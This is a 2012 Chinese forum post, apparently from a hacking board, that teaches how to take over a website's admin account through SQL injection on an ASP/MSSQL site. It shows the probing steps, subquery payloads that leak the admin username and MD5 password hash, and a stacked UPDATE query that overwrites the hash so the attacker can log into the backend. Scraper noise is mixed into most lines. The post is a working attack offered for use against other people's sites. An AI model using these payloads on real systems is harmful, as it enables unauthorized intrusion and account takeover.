经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。* \# Q4 }7 Y& r/ B3 G1 _ S/ T
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
6 M1 L+ d# P% y/ p测试如下:
) T0 ?2 W! o6 Y( T4 Lhttp://www.tmdsb.com/news.asp?id=121
" O+ L7 q4 J3 |+ W6 \! K' l: |在地址后输入单引号,显示
' A K$ A: u& z' C$ S2 p6 k- `" zMicrosoft OLE DB Provider for SQL Server 错误 ’80040e14’
* g5 Y1 Y' R2 _9 W字符串 ’’’ 之前有未闭合的引号
) ]2 x& v% u/ r& [; O& Z/news/tmdws.asp,行63
* t+ \* d/ \3 m6 t t说明没有过滤单引号且数据库是MSSQL. a: X/ ?! U$ b# ]( g, W% b
and 1=1正常。and 1=2出错。肯定存在注入. W5 k4 ]1 {- N
接着输入- `$ |1 q/ ^* t! g: s' C/ C
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
/ y% ]9 o, t: e5 K* ~得到帐号为:admin9 T: L j( a: l& O
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
2 v. g/ e( m/ r% ]" J8 W得到密码为:a4716077c2ba075c
6 V3 e1 M/ T! i接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
, b( }+ J" ?: Q8 G! p( p0 e命令如下 :
9 @* E( e5 `# u7 K2 R5 K& w3 ]5 x;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
/ k& ?8 t# z6 V这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41